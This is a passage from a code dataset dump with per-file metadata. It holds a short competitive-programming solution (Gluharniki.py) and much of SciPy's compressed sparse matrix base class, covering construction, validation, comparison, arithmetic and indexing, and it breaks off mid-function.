] | null | null | null | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
] | null | null | null | Gluharniki.py | regostar/competitive_prog_py | 56db79c431c5823039e6749063f3b21d5e79ca44 | [
"MIT"
] | null | null | null | from math import ceil
t = int(input())
for _ in range(t):
row, col = map(int,input().split())
print(ceil((row * col) / 2)) | 21.833333 | 39 | 0.587786 | from math import ceil
t = int(input())
for _ in range(t):
row, col = map(int,input().split())
print(ceil((row * col) / 2)) | true | true |
f72ef03ed69fe6f6031c918f52dc15739624e63f | 50,478 | py | Python | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | scipy/sparse/compressed.py | ririw/scipy | 680ecf8c52966343827903e6b7983b1ef7323fe2 | [
"BSD-3-Clause"
] | null | null | null | """Base class for sparse matrix formats using compressed storage."""
from __future__ import division, print_function, absolute_import
__all__ = []
from warnings import warn
import operator
import numpy as np
from scipy._lib._util import _prune_array
from .base import spmatrix, isspmatrix, SparseEfficiencyWarning
from .data import _data_matrix, _minmax_mixin
from .dia import dia_matrix
from . import _sparsetools
from ._sparsetools import (get_csr_submatrix, csr_sample_offsets, csr_todense,
csr_sample_values, csr_row_index, csr_row_slice,
csr_column_index1, csr_column_index2)
from ._index import IndexMixin
from .sputils import (upcast, upcast_char, to_native, isdense, isshape,
getdtype, isscalarlike, isintlike, get_index_dtype,
downcast_intp_index, get_sum_dtype, check_shape,
matrix, asmatrix, is_pydata_spmatrix)
class _cs_matrix(_data_matrix, _minmax_mixin, IndexMixin):
"""base matrix class for compressed row- and column-oriented matrices"""
    def __init__(self, arg1, shape=None, dtype=None, copy=False):
        """Build a compressed sparse matrix from a sparse matrix, a shape
        tuple, a ``(data, ij)`` / ``(data, indices, indptr)`` tuple, or a
        dense array-like; optional ``shape``/``dtype`` override the result.
        """
        _data_matrix.__init__(self)

        if isspmatrix(arg1):
            if arg1.format == self.format and copy:
                arg1 = arg1.copy()
            else:
                # format conversion already produces a fresh matrix
                arg1 = arg1.asformat(self.format)
            self._set_self(arg1)

        elif isinstance(arg1, tuple):
            if isshape(arg1):
                # It's a tuple of matrix dimensions (M, N)
                # create empty matrix
                self._shape = check_shape(arg1)
                M, N = self.shape
                # Select index dtype large enough to pass array and
                # scalar parameters to sparsetools
                idx_dtype = get_index_dtype(maxval=max(M, N))
                self.data = np.zeros(0, getdtype(dtype, default=float))
                self.indices = np.zeros(0, idx_dtype)
                self.indptr = np.zeros(self._swap((M, N))[0] + 1,
                                       dtype=idx_dtype)
            else:
                if len(arg1) == 2:
                    # (data, ij) format
                    from .coo import coo_matrix
                    other = self.__class__(coo_matrix(arg1, shape=shape))
                    self._set_self(other)
                elif len(arg1) == 3:
                    # (data, indices, indptr) format
                    (data, indices, indptr) = arg1

                    # Select index dtype large enough to pass array and
                    # scalar parameters to sparsetools
                    maxval = None
                    if shape is not None:
                        maxval = max(shape)
                    idx_dtype = get_index_dtype((indices, indptr),
                                                maxval=maxval,
                                                check_contents=True)

                    self.indices = np.array(indices, copy=copy,
                                            dtype=idx_dtype)
                    self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
                    self.data = np.array(data, copy=copy, dtype=dtype)
                else:
                    raise ValueError("unrecognized {}_matrix "
                                     "constructor usage".format(self.format))

        else:
            # must be dense
            try:
                arg1 = np.asarray(arg1)
            except Exception:
                raise ValueError("unrecognized {}_matrix constructor usage"
                                 "".format(self.format))
            from .coo import coo_matrix
            self._set_self(self.__class__(coo_matrix(arg1, dtype=dtype)))

        # Read matrix dimensions given, if any
        if shape is not None:
            self._shape = check_shape(shape)
        else:
            if self.shape is None:
                # shape not already set, try to infer dimensions
                try:
                    major_dim = len(self.indptr) - 1
                    minor_dim = self.indices.max() + 1
                except Exception:
                    raise ValueError('unable to infer matrix dimensions')
                else:
                    self._shape = check_shape(self._swap((major_dim,
                                                          minor_dim)))

        if dtype is not None:
            self.data = self.data.astype(dtype, copy=False)

        # cheap structural validation only (full_check=False)
        self.check_format(full_check=False)
    def getnnz(self, axis=None):
        # axis=None: total stored entries is the final indptr value.
        if axis is None:
            return int(self.indptr[-1])
        else:
            if axis < 0:
                axis += 2
            # map the user axis onto this format's (major, minor) axes
            axis, _ = self._swap((axis, 1 - axis))
            _, N = self._swap(self.shape)
            if axis == 0:
                # count per minor-axis index
                return np.bincount(downcast_intp_index(self.indices),
                                   minlength=N)
            elif axis == 1:
                # count per major-axis index straight from indptr
                return np.diff(self.indptr)
            raise ValueError('axis out of bounds')

    getnnz.__doc__ = spmatrix.getnnz.__doc__
def _set_self(self, other, copy=False):
"""take the member variables of other and assign them to self"""
if copy:
other = other.copy()
self.data = other.data
self.indices = other.indices
self.indptr = other.indptr
self._shape = check_shape(other.shape)
    def check_format(self, full_check=True):
        """check whether the matrix format is valid

        Parameters
        ----------
        full_check : bool, optional
            If `True`, rigorous check, O(N) operations. Otherwise
            basic check, O(1) operations (default True).
        """
        # use _swap to determine proper bounds
        major_name, minor_name = self._swap(('row', 'column'))
        major_dim, minor_dim = self._swap(self.shape)

        # index arrays should have integer data types
        if self.indptr.dtype.kind != 'i':
            warn("indptr array has non-integer dtype ({})"
                 "".format(self.indptr.dtype.name), stacklevel=3)
        if self.indices.dtype.kind != 'i':
            warn("indices array has non-integer dtype ({})"
                 "".format(self.indices.dtype.name), stacklevel=3)

        # normalize both index arrays to a common index dtype
        idx_dtype = get_index_dtype((self.indptr, self.indices))
        self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
        self.indices = np.asarray(self.indices, dtype=idx_dtype)
        self.data = to_native(self.data)

        # check array shapes
        for x in [self.data.ndim, self.indices.ndim, self.indptr.ndim]:
            if x != 1:
                raise ValueError('data, indices, and indptr should be 1-D')

        # check index pointer
        if (len(self.indptr) != major_dim + 1):
            raise ValueError("index pointer size ({}) should be ({})"
                             "".format(len(self.indptr), major_dim + 1))
        if (self.indptr[0] != 0):
            raise ValueError("index pointer should start with 0")

        # check index and data arrays
        if (len(self.indices) != len(self.data)):
            raise ValueError("indices and data should have the same size")
        if (self.indptr[-1] > len(self.indices)):
            raise ValueError("Last value of index pointer should be less than "
                             "the size of index and data arrays")

        self.prune()

        if full_check:
            # check format validity (more expensive)
            if self.nnz > 0:
                if self.indices.max() >= minor_dim:
                    raise ValueError("{} index values must be < {}"
                                     "".format(minor_name, minor_dim))
                if self.indices.min() < 0:
                    raise ValueError("{} index values must be >= 0"
                                     "".format(minor_name))
                if np.diff(self.indptr).min() < 0:
                    raise ValueError("index pointer values must form a "
                                     "non-decreasing sequence")

        # if not self.has_sorted_indices():
        #    warn('Indices were not in sorted order. Sorting indices.')
        #    self.sort_indices()
        #    assert(self.has_sorted_indices())
        # TODO check for duplicates?
#######################
# Boolean comparisons #
#######################
def _scalar_binopt(self, other, op):
"""Scalar version of self._binopt, for cases in which no new nonzeros
are added. Produces a new spmatrix in canonical form.
"""
self.sum_duplicates()
res = self._with_data(op(self.data, other), copy=True)
res.eliminate_zeros()
return res
    def __eq__(self, other):
        """Elementwise == against a scalar, dense array, or sparse matrix."""
        # Scalar other.
        if isscalarlike(other):
            if np.isnan(other):
                # nothing equals nan: all-False (empty) boolean matrix
                return self.__class__(self.shape, dtype=np.bool_)

            if other == 0:
                warn("Comparing a sparse matrix with 0 using == is inefficient"
                     ", try using != instead.", SparseEfficiencyWarning,
                     stacklevel=3)
                # x == 0 is the complement of x != 0
                all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
                inv = self._scalar_binopt(other, operator.ne)
                return all_true - inv
            else:
                return self._scalar_binopt(other, operator.eq)
        # Dense other.
        elif isdense(other):
            return self.todense() == other
        # Pydata sparse other.
        elif is_pydata_spmatrix(other):
            return NotImplemented
        # Sparse other.
        elif isspmatrix(other):
            warn("Comparing sparse matrices using == is inefficient, try using"
                 " != instead.", SparseEfficiencyWarning, stacklevel=3)
            # TODO sparse broadcasting
            if self.shape != other.shape:
                return False
            elif self.format != other.format:
                other = other.asformat(self.format)
            # equality is the complement of elementwise !=
            res = self._binopt(other, '_ne_')
            all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
            return all_true - res
        else:
            return False
def __ne__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
warn("Comparing a sparse matrix with nan using != is"
" inefficient", SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true
elif other != 0:
warn("Comparing a sparse matrix with a nonzero scalar using !="
" is inefficient, try using == instead.",
SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape), dtype=np.bool_)
inv = self._scalar_binopt(other, operator.eq)
return all_true - inv
else:
return self._scalar_binopt(other, operator.ne)
# Dense other.
elif isdense(other):
return self.todense() != other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
# TODO sparse broadcasting
if self.shape != other.shape:
return True
elif self.format != other.format:
other = other.asformat(self.format)
return self._binopt(other, '_ne_')
else:
return True
    def _inequality(self, other, op, op_name, bad_scalar_msg):
        """Shared implementation for <, >, <=, >= comparisons.

        ``op`` is the Python operator, ``op_name`` the sparsetools kernel
        name, and ``bad_scalar_msg`` the warning for scalars that would
        densify the result.
        """
        # Scalar other.
        if isscalarlike(other):
            if 0 == other and op_name in ('_le_', '_ge_'):
                raise NotImplementedError(" >= and <= don't work with 0.")
            elif op(0, other):
                # comparison is True at the implicit zeros -> dense result
                warn(bad_scalar_msg, SparseEfficiencyWarning)
                other_arr = np.empty(self.shape, dtype=np.result_type(other))
                other_arr.fill(other)
                other_arr = self.__class__(other_arr)
                return self._binopt(other_arr, op_name)
            else:
                return self._scalar_binopt(other, op)
        # Dense other.
        elif isdense(other):
            return op(self.todense(), other)
        # Sparse other.
        elif isspmatrix(other):
            # TODO sparse broadcasting
            if self.shape != other.shape:
                raise ValueError("inconsistent shapes")
            elif self.format != other.format:
                other = other.asformat(self.format)
            if op_name not in ('_ge_', '_le_'):
                return self._binopt(other, op_name)

            warn("Comparing sparse matrices using >= and <= is inefficient, "
                 "using <, >, or !=, instead.", SparseEfficiencyWarning)
            # a <= b  is the complement of  a > b  (and likewise for >=)
            all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
            res = self._binopt(other, '_gt_' if op_name == '_le_' else '_lt_')
            return all_true - res
        else:
            raise ValueError("Operands could not be compared.")
def __lt__(self, other):
return self._inequality(other, operator.lt, '_lt_',
"Comparing a sparse matrix with a scalar "
"greater than zero using < is inefficient, "
"try using >= instead.")
def __gt__(self, other):
return self._inequality(other, operator.gt, '_gt_',
"Comparing a sparse matrix with a scalar "
"less than zero using > is inefficient, "
"try using <= instead.")
def __le__(self, other):
return self._inequality(other, operator.le, '_le_',
"Comparing a sparse matrix with a scalar "
"greater than zero using <= is inefficient, "
"try using > instead.")
def __ge__(self, other):
return self._inequality(other, operator.ge, '_ge_',
"Comparing a sparse matrix with a scalar "
"less than zero using >= is inefficient, "
"try using < instead.")
#################################
# Arithmetic operator overrides #
#################################
    def _add_dense(self, other):
        """Add a dense array of the same shape; returns a dense matrix."""
        if other.shape != self.shape:
            raise ValueError('Incompatible shapes.')
        dtype = upcast_char(self.dtype.char, other.dtype.char)
        # choose C order for CSR, F order for CSC so the kernel sees CSR
        order = self._swap('CF')[0]
        result = np.array(other, dtype=dtype, order=order, copy=True)
        M, N = self._swap(self.shape)
        y = result if result.flags.c_contiguous else result.T
        # adds self's entries into y in place
        csr_todense(M, N, self.indptr, self.indices, self.data, y)
        return matrix(result, copy=False)
    def _add_sparse(self, other):
        # sparse + sparse via the sparsetools elementwise-plus kernel
        return self._binopt(other, '_plus_')
    def _sub_sparse(self, other):
        # sparse - sparse via the sparsetools elementwise-minus kernel
        return self._binopt(other, '_minus_')
    def multiply(self, other):
        """Point-wise multiplication by another matrix, vector, or
        scalar.

        Supports broadcasting of row/column vectors (sparse or dense)
        against this matrix; the result format depends on the branch taken
        (same format, COO, or dense).
        """
        # Scalar multiplication.
        if isscalarlike(other):
            return self._mul_scalar(other)
        # Sparse matrix or vector.
        if isspmatrix(other):
            if self.shape == other.shape:
                other = self.__class__(other)
                return self._binopt(other, '_elmul_')
            # Single element.
            elif other.shape == (1, 1):
                return self._mul_scalar(other.toarray()[0, 0])
            elif self.shape == (1, 1):
                return other._mul_scalar(self.toarray()[0, 0])
            # A row times a column.
            elif self.shape[1] == 1 and other.shape[0] == 1:
                return self._mul_sparse_matrix(other.tocsc())
            elif self.shape[0] == 1 and other.shape[1] == 1:
                return other._mul_sparse_matrix(self.tocsc())
            # Row vector times matrix. other is a row.
            elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
                # broadcast the row by embedding it in a diagonal matrix
                other = dia_matrix((other.toarray().ravel(), [0]),
                                   shape=(other.shape[1], other.shape[1]))
                return self._mul_sparse_matrix(other)
            # self is a row.
            elif self.shape[0] == 1 and self.shape[1] == other.shape[1]:
                copy = dia_matrix((self.toarray().ravel(), [0]),
                                  shape=(self.shape[1], self.shape[1]))
                return other._mul_sparse_matrix(copy)
            # Column vector times matrix. other is a column.
            elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
                other = dia_matrix((other.toarray().ravel(), [0]),
                                   shape=(other.shape[0], other.shape[0]))
                return other._mul_sparse_matrix(self)
            # self is a column.
            elif self.shape[1] == 1 and self.shape[0] == other.shape[0]:
                copy = dia_matrix((self.toarray().ravel(), [0]),
                                  shape=(self.shape[0], self.shape[0]))
                return copy._mul_sparse_matrix(other)
            else:
                raise ValueError("inconsistent shapes")

        # Assume other is a dense matrix/array, which produces a single-item
        # object array if other isn't convertible to ndarray.
        other = np.atleast_2d(other)

        if other.ndim != 2:
            return np.multiply(self.toarray(), other)
        # Single element / wrapped object.
        if other.size == 1:
            return self._mul_scalar(other.flat[0])
        # Fast case for trivial sparse matrix.
        elif self.shape == (1, 1):
            return np.multiply(self.toarray()[0, 0], other)

        from .coo import coo_matrix
        ret = self.tocoo()
        # Matching shapes.
        if self.shape == other.shape:
            data = np.multiply(ret.data, other[ret.row, ret.col])
        # Sparse row vector times...
        elif self.shape[0] == 1:
            if other.shape[1] == 1:  # Dense column vector.
                data = np.multiply(ret.data, other)
            elif other.shape[1] == self.shape[1]:  # Dense matrix.
                data = np.multiply(ret.data, other[:, ret.col])
            else:
                raise ValueError("inconsistent shapes")
            # replicate the sparse row's pattern down every result row
            row = np.repeat(np.arange(other.shape[0]), len(ret.row))
            col = np.tile(ret.col, other.shape[0])
            return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
                              shape=(other.shape[0], self.shape[1]),
                              copy=False)
        # Sparse column vector times...
        elif self.shape[1] == 1:
            if other.shape[0] == 1:  # Dense row vector.
                data = np.multiply(ret.data[:, None], other)
            elif other.shape[0] == self.shape[0]:  # Dense matrix.
                data = np.multiply(ret.data[:, None], other[ret.row])
            else:
                raise ValueError("inconsistent shapes")
            # replicate the sparse column's pattern across every result column
            row = np.repeat(ret.row, other.shape[1])
            col = np.tile(np.arange(other.shape[1]), len(ret.col))
            return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
                              shape=(self.shape[0], other.shape[1]),
                              copy=False)
        # Sparse matrix times dense row vector.
        elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
            data = np.multiply(ret.data, other[:, ret.col].ravel())
        # Sparse matrix times dense column vector.
        elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
            data = np.multiply(ret.data, other[ret.row].ravel())
        else:
            raise ValueError("inconsistent shapes")
        ret.data = data.view(np.ndarray).ravel()
        return ret
###########################
# Multiplication handlers #
###########################
    def _mul_vector(self, other):
        """Matrix-vector product with a dense 1-D vector ``other``."""
        M, N = self.shape

        # output array
        result = np.zeros(M, dtype=upcast_char(self.dtype.char,
                                               other.dtype.char))

        # csr_matvec or csc_matvec
        fn = getattr(_sparsetools, self.format + '_matvec')
        fn(M, N, self.indptr, self.indices, self.data, other, result)

        return result
    def _mul_multivector(self, other):
        """Matrix product with a dense 2-D array of column vectors."""
        M, N = self.shape
        n_vecs = other.shape[1]  # number of column vectors

        result = np.zeros((M, n_vecs),
                          dtype=upcast_char(self.dtype.char, other.dtype.char))

        # csr_matvecs or csc_matvecs
        fn = getattr(_sparsetools, self.format + '_matvecs')
        fn(M, N, n_vecs, self.indptr, self.indices, self.data,
           other.ravel(), result.ravel())

        return result
    def _mul_sparse_matrix(self, other):
        """Sparse-sparse matrix product using the two-pass sparsetools
        matmat kernels (first count the nnz, then fill the result).
        """
        M, K1 = self.shape
        K2, N = other.shape

        major_axis = self._swap((M, N))[0]
        other = self.__class__(other)  # convert to this format

        idx_dtype = get_index_dtype((self.indptr, self.indices,
                                     other.indptr, other.indices))

        # pass 1: determine the result's nnz
        fn = getattr(_sparsetools, self.format + '_matmat_maxnnz')
        nnz = fn(M, N,
                 np.asarray(self.indptr, dtype=idx_dtype),
                 np.asarray(self.indices, dtype=idx_dtype),
                 np.asarray(other.indptr, dtype=idx_dtype),
                 np.asarray(other.indices, dtype=idx_dtype))

        # re-select an index dtype that can also hold nnz
        idx_dtype = get_index_dtype((self.indptr, self.indices,
                                     other.indptr, other.indices),
                                    maxval=nnz)

        indptr = np.empty(major_axis + 1, dtype=idx_dtype)
        indices = np.empty(nnz, dtype=idx_dtype)
        data = np.empty(nnz, dtype=upcast(self.dtype, other.dtype))

        # pass 2: compute the product into the preallocated arrays
        fn = getattr(_sparsetools, self.format + '_matmat')
        fn(M, N, np.asarray(self.indptr, dtype=idx_dtype),
           np.asarray(self.indices, dtype=idx_dtype),
           self.data,
           np.asarray(other.indptr, dtype=idx_dtype),
           np.asarray(other.indices, dtype=idx_dtype),
           other.data,
           indptr, indices, data)

        return self.__class__((data, indices, indptr), shape=(M, N))
    def diagonal(self, k=0):
        rows, cols = self.shape
        if k <= -rows or k >= cols:
            raise ValueError("k exceeds matrix dimensions")
        fn = getattr(_sparsetools, self.format + "_diagonal")
        # length of the k-th diagonal of an (rows, cols) matrix
        y = np.empty(min(rows + min(k, 0), cols - max(k, 0)),
                     dtype=upcast(self.dtype))
        fn(k, self.shape[0], self.shape[1], self.indptr, self.indices,
           self.data, y)
        return y

    diagonal.__doc__ = spmatrix.diagonal.__doc__
#####################
# Other binary ops #
#####################
    def _maximum_minimum(self, other, npop, op_name, dense_check):
        """Shared implementation of maximum()/minimum().

        ``npop`` is the numpy ufunc, ``op_name`` the sparsetools kernel,
        and ``dense_check(scalar)`` is True when the op against that scalar
        would make the implicit zeros nonzero (densifying the result).
        """
        if isscalarlike(other):
            if dense_check(other):
                warn("Taking maximum (minimum) with > 0 (< 0) number results"
                     " to a dense matrix.", SparseEfficiencyWarning,
                     stacklevel=3)
                other_arr = np.empty(self.shape, dtype=np.asarray(other).dtype)
                other_arr.fill(other)
                other_arr = self.__class__(other_arr)
                return self._binopt(other_arr, op_name)
            else:
                # zeros stay zero: apply the ufunc to stored values only
                self.sum_duplicates()
                new_data = npop(self.data, np.asarray(other))
                mat = self.__class__((new_data, self.indices, self.indptr),
                                     dtype=new_data.dtype, shape=self.shape)
                return mat
        elif isdense(other):
            return npop(self.todense(), other)
        elif isspmatrix(other):
            return self._binopt(other, op_name)
        else:
            raise ValueError("Operands not compatible.")
def maximum(self, other):
return self._maximum_minimum(other, np.maximum,
'_maximum_', lambda x: np.asarray(x) > 0)
maximum.__doc__ = spmatrix.maximum.__doc__
def minimum(self, other):
return self._maximum_minimum(other, np.minimum,
'_minimum_', lambda x: np.asarray(x) < 0)
minimum.__doc__ = spmatrix.minimum.__doc__
#####################
# Reduce operations #
#####################
    def sum(self, axis=None, dtype=None, out=None):
        """Sum the matrix over the given axis.  If the axis is None, sum
        over both rows and columns, returning a scalar.
        """
        # The spmatrix base class already does axis=0 and axis=1 efficiently
        # so we only do the case axis=None here
        if (not hasattr(self, 'blocksize') and
                axis in self._swap(((1, -1), (0, 2)))[0]):
            # faster than multiplication for large minor axis in CSC/CSR
            res_dtype = get_sum_dtype(self.dtype)
            ret = np.zeros(len(self.indptr) - 1, dtype=res_dtype)

            major_index, value = self._minor_reduce(np.add)
            ret[major_index] = value
            ret = asmatrix(ret)
            if axis % 2 == 1:
                # return a column vector for row-wise sums
                ret = ret.T

            if out is not None and out.shape != ret.shape:
                raise ValueError('dimensions do not match')

            # no-op sum to honor dtype/out semantics of np.matrix.sum
            return ret.sum(axis=(), dtype=dtype, out=out)
        # spmatrix will handle the remaining situations when axis
        # is in {None, -1, 0, 1}
        else:
            return spmatrix.sum(self, axis=axis, dtype=dtype, out=out)

    sum.__doc__ = spmatrix.sum.__doc__
    def _minor_reduce(self, ufunc, data=None):
        """Reduce nonzeros with a ufunc over the minor axis when non-empty

        Can be applied to a function of self.data by supplying data parameter.

        Warning: this does not call sum_duplicates()

        Returns
        -------
        major_index : array of ints
            Major indices where nonzero

        value : array of self.dtype
            Reduce result for nonzeros in each major_index
        """
        if data is None:
            data = self.data
        # rows (or columns, for CSC) that actually hold stored entries
        major_index = np.flatnonzero(np.diff(self.indptr))
        value = ufunc.reduceat(data,
                               downcast_intp_index(self.indptr[major_index]))
        return major_index, value
#######################
# Getting and Setting #
#######################
    def _get_intXint(self, row, col):
        """Return the scalar at (row, col), summing duplicate entries."""
        M, N = self._swap(self.shape)
        major, minor = self._swap((row, col))
        indptr, indices, data = get_csr_submatrix(
            M, N, self.indptr, self.indices, self.data,
            major, major + 1, minor, minor + 1)
        # a 1x1 submatrix may contain duplicates; sum yields the true value
        return data.sum(dtype=self.dtype)
    def _get_sliceXslice(self, row, col):
        """Slice both axes; fast path for contiguous (step-1) slices."""
        major, minor = self._swap((row, col))
        if major.step in (1, None) and minor.step in (1, None):
            return self._get_submatrix(major, minor, copy=True)
        return self._major_slice(major)._minor_slice(minor)
    def _get_arrayXarray(self, row, col):
        # inner indexing
        idx_dtype = self.indices.dtype
        M, N = self._swap(self.shape)
        major, minor = self._swap((row, col))

        major = np.asarray(major, dtype=idx_dtype)
        minor = np.asarray(minor, dtype=idx_dtype)

        # sample one value per (major, minor) pair into val
        val = np.empty(major.size, dtype=self.dtype)
        csr_sample_values(M, N, self.indptr, self.indices, self.data,
                          major.size, major.ravel(), minor.ravel(), val)
        if major.ndim == 1:
            return asmatrix(val)
        return self.__class__(val.reshape(major.shape))
    def _get_columnXarray(self, row, col):
        # outer indexing
        major, minor = self._swap((row, col))
        return self._major_index_fancy(major)._minor_index_fancy(minor)
def _major_index_fancy(self, idx):
"""Index along the major axis where idx is an array of ints.
"""
idx_dtype = self.indices.dtype
indices = np.asarray(idx, dtype=idx_dtype).ravel()
_, N = self._swap(self.shape)
M = len(indices)
new_shape = self._swap((M, N))
if M == 0:
return self.__class__(new_shape)
row_nnz = np.diff(self.indptr)
idx_dtype = self.indices.dtype
res_indptr = np.zeros(M+1, dtype=idx_dtype)
np.cumsum(row_nnz[idx], out=res_indptr[1:])
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_row_index(M, indices, self.indptr, self.indices, self.data,
res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
    def _major_slice(self, idx, copy=False):
        """Index along the major axis where idx is a slice object.
        """
        if idx == slice(None):
            return self.copy() if copy else self

        M, N = self._swap(self.shape)
        start, stop, step = idx.indices(M)
        M = len(range(start, stop, step))
        new_shape = self._swap((M, N))
        if M == 0:
            return self.__class__(new_shape)

        # new indptr is the running total of nnz over the selected slices
        row_nnz = np.diff(self.indptr)
        idx_dtype = self.indices.dtype
        res_indptr = np.zeros(M+1, dtype=idx_dtype)
        np.cumsum(row_nnz[idx], out=res_indptr[1:])

        if step == 1:
            # contiguous slices share one contiguous run of indices/data
            all_idx = slice(self.indptr[start], self.indptr[stop])
            res_indices = np.array(self.indices[all_idx], copy=copy)
            res_data = np.array(self.data[all_idx], copy=copy)
        else:
            nnz = res_indptr[-1]
            res_indices = np.empty(nnz, dtype=idx_dtype)
            res_data = np.empty(nnz, dtype=self.dtype)
            csr_row_slice(start, stop, step, self.indptr, self.indices,
                          self.data, res_indices, res_data)

        return self.__class__((res_data, res_indices, res_indptr),
                              shape=new_shape, copy=False)
def _minor_index_fancy(self, idx):
"""Index along the minor axis where idx is an array of ints.
"""
idx_dtype = self.indices.dtype
idx = np.asarray(idx, dtype=idx_dtype).ravel()
M, N = self._swap(self.shape)
k = len(idx)
new_shape = self._swap((M, k))
if k == 0:
return self.__class__(new_shape)
# pass 1: count idx entries and compute new indptr
col_offsets = np.zeros(N, dtype=idx_dtype)
res_indptr = np.empty_like(self.indptr)
csr_column_index1(k, idx, M, N, self.indptr, self.indices,
col_offsets, res_indptr)
# pass 2: copy indices/data for selected idxs
col_order = np.argsort(idx).astype(idx_dtype, copy=False)
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_column_index2(col_order, col_offsets, len(self.indices),
self.indices, self.data, res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _minor_slice(self, idx, copy=False):
"""Index along the minor axis where idx is a slice object.
"""
if idx == slice(None):
return self.copy() if copy else self
M, N = self._swap(self.shape)
start, stop, step = idx.indices(N)
N = len(range(start, stop, step))
if N == 0:
return self.__class__(self._swap((M, N)))
if step == 1:
return self._get_submatrix(minor=idx, copy=copy)
# TODO: don't fall back to fancy indexing here
return self._minor_index_fancy(np.arange(start, stop, step))
def _get_submatrix(self, major=None, minor=None, copy=False):
"""Return a submatrix of this matrix.
major, minor: None, int, or slice with step 1
"""
M, N = self._swap(self.shape)
i0, i1 = _process_slice(major, M)
j0, j1 = _process_slice(minor, N)
if i0 == 0 and j0 == 0 and i1 == M and j1 == N:
return self.copy() if copy else self
indptr, indices, data = get_csr_submatrix(
M, N, self.indptr, self.indices, self.data, i0, i1, j0, j1)
shape = self._swap((i1 - i0, j1 - j0))
return self.__class__((data, indices, indptr), shape=shape,
dtype=self.dtype, copy=False)
def _set_intXint(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray_sparse(self, row, col, x):
# clear entries that will be overwritten
self._zero_many(*self._swap((row, col)))
M, N = row.shape # matches col.shape
broadcast_row = M != 1 and x.shape[0] == 1
broadcast_col = N != 1 and x.shape[1] == 1
r, c = x.row, x.col
x = np.asarray(x.data, dtype=self.dtype)
if broadcast_row:
r = np.repeat(np.arange(M), len(r))
c = np.tile(c, M)
x = np.tile(x, M)
if broadcast_col:
r = np.repeat(r, N)
c = np.tile(np.arange(N), len(c))
x = np.repeat(x, N)
# only assign entries in the new sparsity structure
i, j = self._swap((row[r, c], col[r, c]))
self._set_many(i, j, x)
def _setdiag(self, values, k):
if 0 in self.shape:
return
M, N = self.shape
broadcast = (values.ndim == 0)
if k < 0:
if broadcast:
max_index = min(M + k, N)
else:
max_index = min(M + k, N, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
i -= k
else:
if broadcast:
max_index = min(M, N - k)
else:
max_index = min(M, N - k, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
j += k
if not broadcast:
values = values[:len(i)]
self[i, j] = values
def _prepare_indices(self, i, j):
M, N = self._swap(self.shape)
def check_bounds(indices, bound):
idx = indices.max()
if idx >= bound:
raise IndexError('index (%d) out of range (>= %d)' %
(idx, bound))
idx = indices.min()
if idx < -bound:
raise IndexError('index (%d) out of range (< -%d)' %
(idx, bound))
i = np.array(i, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
j = np.array(j, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
check_bounds(i, M)
check_bounds(j, N)
return i, j, M, N
def _set_many(self, i, j, x):
"""Sets value at each (i, j) to x
Here (i,j) index major and minor respectively, and must not contain
duplicate entries.
"""
i, j, M, N = self._prepare_indices(i, j)
x = np.array(x, dtype=self.dtype, copy=False, ndmin=1).ravel()
n_samples = x.size
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
# rinse and repeat
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if -1 not in offsets:
# only affects existing non-zero cells
self.data[offsets] = x
return
else:
warn("Changing the sparsity structure of a {}_matrix is expensive."
" lil_matrix is more efficient.".format(self.format),
SparseEfficiencyWarning, stacklevel=3)
# replace where possible
mask = offsets > -1
self.data[offsets[mask]] = x[mask]
# only insertions remain
mask = ~mask
i = i[mask]
i[i < 0] += M
j = j[mask]
j[j < 0] += N
self._insert_many(i, j, x[mask])
def _zero_many(self, i, j):
"""Sets value at each (i, j) to zero, preserving sparsity structure.
Here (i,j) index major and minor respectively.
"""
i, j, M, N = self._prepare_indices(i, j)
n_samples = len(i)
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
# rinse and repeat
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
# only assign zeros to the existing sparsity structure
self.data[offsets[offsets > -1]] = 0
def _insert_many(self, i, j, x):
"""Inserts new nonzero at each (i, j) with value x
Here (i,j) index major and minor respectively.
